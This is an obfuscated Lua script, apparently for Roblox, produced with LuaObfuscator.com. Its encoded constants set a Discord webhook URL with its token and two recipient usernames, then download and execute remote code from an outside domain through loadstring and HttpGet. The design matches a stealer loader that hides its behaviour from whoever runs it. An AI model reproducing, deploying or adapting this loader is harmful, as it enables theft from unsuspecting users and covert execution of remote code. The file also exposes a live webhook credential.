--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=v2(v0(v30,16));if v19 then local v92=v5(v80,v19);v19=nil;return v92;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(0 + 0) -(0 -0) ;local v82;while true do if (v81==0) then v82=(v31/((5 -3)^(v32-(1 -0))))%(((1069 -(68 + 997)) -(1272 -(226 + 1044)))^(((v33-(620 -((2416 -1861) + 64))) -(v32-(932 -(857 + (191 -(32 + 85)))))) + ((558 + 11) -(367 + 201)))) ;return v82-(v82%(928 -(214 + 713))) ;end end else local v83=0 + 0 ;local v84;while true do if (v83==(0 + 0)) then v84=2^(v32-(878 -(282 + 595))) ;return (((v31%(v84 + v84))>=v84) and 1) or ((364 + 1273) -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + ((4 + 1) -2) );v18=v18 + (7 -(7 -4)) ;return (v40 * (16777566 -(87 + 194 + 69))) + (v39 * (65716 -((266 -199) + 113))) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=953 -(802 + 150) ;local v44=(v20(v42,1,53 -33 ) * ((3 -1)^(24 + 8))) + v41 ;local v45=v20(v42,(437 + 581) -(915 + 82) ,87 -56 );local v46=((v20(v42,(33 -14) + 13 )==(1 -(438 -(145 + 293)))) and  -((1618 -(44 + 386)) -(1069 + 118))) or (2 -1) ;if (v45==((1486 -(998 + 488)) -0)) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else local v93=0;while true do if (v93==0) then v45=1 + 0 ;v43=791 -(368 + 423) ;break;end end end elseif (v45==(6433 -4386)) then return ((v44==(18 -(10 + 8))) and (v46 * (1/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(325 + 698) ) * (v43 + (v44/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v47) local v48;if  not v47 then local v85=0 + 0 ;while true do if (v85==(0 -0)) then v47=v23();if (v47==(772 -((713 -512) + 571))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v63=1139 -(116 + 1022) , #v48 do v49[v63]=v2(v1(v3(v48,v63,v63)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;while true do if ((2 + 0)==v50) then for v94=1,v23() do local v95=v21();if (v20(v95,1,1)~=(0 + 0)) then else local v102=0 + 0 ;local v103;local v104;local v105;local v106;while true do if (v102==2) then while true do if (v103~=2) then else local v133=0;local v134;while true do if ((836 -(660 + 176))==v133) then v134=0 + 0 ;while true do if (v134~=0) then else if (v20(v105,203 -(14 + 188) ,1)~=(676 -(534 + 141))) then else v106[1 + 1 ]=v56[v106[2]];end if (v20(v105,2 + 0 ,2)~=(1 + 0)) then else v106[6 -3 ]=v56[v106[4 -1 ]];end v134=2 -1 ;end if (1~=v134) then else v103=3;break;end end break;end end end if (v103==(1 + 0)) then local v135=0;local v136;while true do if (v135==0) then v136=0;while true do if ((0 + 0)==v136) then v106={v22(),v22(),nil,nil};if (v104==0) then local v181=0 -0 ;local v182;while true do if (v181==(0 + 0)) then v182=0 -0 ;while true do if (v182~=(0 -0)) then else v106[870 -(550 + 317) ]=v22();v106[4]=v22();break;end end break;end end elseif (v104==(1 -0)) then v106[3 -0 ]=v23();elseif (v104==2) then v106[8 -5 ]=v23() -(2^16) ;elseif (v104~=3) then else local v187=0;local v188;while true do if (v187==0) then v188=0;while true do if (v188==(285 -(134 + 151))) then v106[1668 -(970 + 695) ]=v23() -(2^16) ;v106[7 -3 ]=v22();break;end end break;end end end v136=1;end if (v136==1) then v103=2;break;end end break;end end end if (v103~=0) then else local v137=0;local v138;while true do if (v137==0) then v138=0;while true do if (v138==(1990 -(582 + 1408))) then v104=v20(v95,2,3);v105=v20(v95,13 -9 ,6);v138=1 -0 ;end if (v138==(3 -2)) then v103=1;break;end end break;end end end if (v103~=(1827 -(1195 + 629))) then else if (v20(v105,3,3)==1) then v106[5 -1 ]=v56[v106[4]];end v51[v94]=v106;break;end end break;end if (v102==(242 -(187 + 54))) then v105=nil;v106=nil;v102=782 -(162 + 618) ;end if (v102==0) then local v113=0 + 0 ;while true do if (v113==(0 + 0)) then v103=0;v104=nil;v113=1 -0 ;end if (v113==(1 -0)) then v102=1 + 0 ;break;end end end end end end for v96=1637 -(1373 + 263) ,v23() do v52[v96-(1001 -(451 + 549)) ]=v28();end return v54;end if (1==v50) then local v89=0 + 0 ;while true do if (v89==2) then v50=2 -0 ;break;end if (v89==1) then for v108=1 -0 ,v55 do local v109=0;local v110;local v111;local v112;while true do if (v109==0) then local v114=0;while true do if (v114~=1) then else v109=1385 -(746 + 638) ;break;end if (v114==(0 + 0)) then v110=0 -0 ;v111=nil;v114=342 -(218 + 123) ;end end end if (1~=v109) then else v112=nil;while true do if ((1582 -(1535 + 46))==v110) then if (v111==1) then v112=v21()~=0 ;elseif (v111==(2 + 0)) then v112=v24();elseif (v111~=3) then else v112=v25();end v56[v108]=v112;break;end if (v110~=(0 + 0)) then else local v161=560 -(306 + 254) ;local v162;while true do if (v161==0) then v162=0;while true do if (v162~=(0 + 0)) then else v111=v21();v112=nil;v162=1 -0 ;end if (v162==(1468 -(899 + 568))) then v110=1 + 0 ;break;end end break;end end end end break;end end end v54[3]=v21();v89=4 -2 ;end if (v89~=(603 -(268 + 335))) then else v55=v23();v56={};v89=291 -(60 + 230) ;end end end if (v50~=0) then else local v90=572 -(426 + 146) ;local v91;while true do if (v90==(0 + 0)) then v91=1456 -(282 + 1174) ;while true do if (v91~=1) then else v53={};v54={v51,v52,nil,v53};v91=2;end if (v91~=(1024 -(706 + 318))) then else v51={};v52={};v91=1;end if (v91==(1253 -(721 + 530))) then v50=1;break;end end break;end end end end end local function v29(v57,v58,v59) local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...) local v65=v60;local v66=v61;local v67=v62;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v86=0,v73 do if (v86>=v67) then v71[v86-v67 ]=v72[v86 + 1 ];else v75[v86]=v72[v86 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=10) then if (v78<=4) then if (v78<=1) then if (v78>0) then local v115=v77[2];local v116=v75[v77[3]];v75[v115 + 1 ]=v116;v75[v115]=v116[v77[4]];elseif (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v78<=2) then do return;end elseif (v78>3) then local v141=v77[2];local v142,v143=v68(v75[v141](v13(v75,v141 + 1 ,v77[3])));v70=(v143 + v141) -1 ;local v144=0;for v163=v141,v70 do v144=v144 + 1 ;v75[v163]=v142[v144];end else v75[v77[2]]=v59[v77[3]];end elseif (v78<=7) then if (v78<=5) then v75[v77[2]]=v77[3];elseif (v78>6) then local v147=0;local v148;local v149;local v150;local v151;while true do if (v147==0) then v148=v77[2];v149,v150=v68(v75[v148](v13(v75,v148 + 1 ,v77[3])));v147=1;end if (v147==2) then for v174=v148,v70 do v151=v151 + 1 ;v75[v174]=v149[v151];end break;end if (v147==1) then v70=(v150 + v148) -1 ;v151=0;v147=2;end end else local v152=v77[2];v75[v152]=v75[v152](v13(v75,v152 + 1 ,v70));end elseif (v78<=8) then v75[v77[2]]=v77[3];elseif (v78==9) then do return;end else v75[v77[2]]();end elseif (v78<=15) then if (v78<=12) then if (v78>11) then v59[v77[3]]=v75[v77[2]];else v59[v77[3]]=v75[v77[2]];end elseif (v78<=13) then local v128=v77[2];v75[v128]=v75[v128](v13(v75,v128 + 1 ,v70));elseif (v78>14) then v69=v77[3];else for v166=v77[2],v77[3] do v75[v166]=nil;end end elseif (v78<=18) then if (v78<=16) then v75[v77[2]]=v59[v77[3]];elseif (v78==17) then for v168=v77[2],v77[3] do v75[v168]=nil;end else local v155=v77[2];local v156=v75[v77[3]];v75[v155 + 1 ]=v156;v75[v155]=v156[v77[4]];end elseif (v78<=19) then v69=v77[3];elseif (v78==20) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else v75[v77[2]]();end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323536352O37322O3938393831372O3531382F5856554377644D736C387462585A4D74677465666E7748325636756D3054425F666739366772445A734D31546F4776634B4574776137454C4A68545F5363676F3646304B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636503083O00557365726E616D6503063O005363652O6E3703093O00557365726E616D653203073O0048654461726B6E001C3O0012053O00014O000E000100013O00264O0002000100010004133O00020001001205000100013O00262O00010011000100020004133O00110001001205000200043O00120B000200033O001210000200053O001210000300063O002012000300030007001205000500084O0007000300054O000600023O00022O000A0002000100010004133O001B000100262O00010005000100010004133O000500010012050002000A3O00120B000200093O0012050002000C3O00120B0002000B3O001205000100023O0004133O000500010004133O001B00010004133O000200012O00023O00017O00",v9(),...);
